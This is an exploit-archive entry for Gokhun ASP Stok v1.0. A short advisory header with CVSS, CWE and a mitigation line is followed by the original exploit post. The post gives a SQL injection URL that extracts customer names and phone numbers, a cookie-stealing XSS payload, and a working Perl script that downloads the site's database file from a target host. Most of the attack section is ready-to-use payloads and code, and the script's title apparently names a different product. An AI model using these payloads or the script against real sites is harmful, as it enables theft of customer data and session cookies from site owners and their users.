Gokhun ASP Stok v1.0 - Multiple Remote Vulnerabilities

vendor:

Gokhun ASP Stok

by:

KnocKout

7,5

CVSS

HIGH

Multiple vulnerabilities

89, 79, 200

CWE

Product Name: Gokhun ASP Stok

Affected Version From: v1.0

Affected Version To: v1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:gokhun:gokhun_asp_stok:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

Gokhun ASP Stok v1.0 – Multiple Remote Vulnerabilities

Gokhun ASP Stok v1.0 is vulnerable to multiple remote vulnerabilities such as SQL Injection, Cross Site Scripting and Remote Database Disclosure. An attacker can exploit these vulnerabilities to gain unauthorized access to the database and execute malicious code on the vulnerable system.

Mitigation:

Apply the latest security patches and ensure that all web applications are configured securely.

Source

Exploit-DB raw data:

============================================
Gokhun ASP Stok v1.0 - Multiple Remote Vulnerabilities
============================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout 
[+] Greatz : DaiMon 
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Script : Gokhun ASP Stok v1.0
~Software: http://www.gokhun.com & http://www.aspindir.com/goster/6092
~Vulnerability Style : Multiple vulnerabilities
~Demo : http://www.site.com/asp/pages/main/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
======== SQL Injection =========

http://[Victim]/?eylemD=urunler&olayD=&islemD=duzenle&kimlikD=1+union+select+0,1,name,ctelephone,4,5,6+from+customers+where+Kimlik=2

==================================
======= Cross Site Scripting =====

http://[Victim]/?eylemD=hizmetlerimiz&olayD=digerhizmetlerimiz%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

==============================
Remote Database DisClosure Exploit
==========================


#!/usr/bin/perl -w
#
# Gokhun ASP Stok v1.0 -> Remote Database Disclosure Exploit
# Coded: KnocKout
# Date: 26.09.2010
# Thanks: DaiMon, BARCOD3
#
 
 
 
use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('title Vural Portal 2010 Remote Database Disclosure Exploit');
system('color 4');


if(@ARGV < 2)
{
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

print "\n************************************************************************\n";
print "\* Gokhun ASP Stok v1.0 -> Remote Database Disclosure Exploit              *\n";
print "\* Exploited By : KnocKout                                                  *\n";
print "\* msn :   knockoutr[at]msn[dot]com                                 *\n";
print "\* Special Thankz : DaiMon                                      *\n";
print "\*********************************************************************\n\n\n";

($TargetIP, $path, $File,) = @ARGV;

$File="database/yb.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}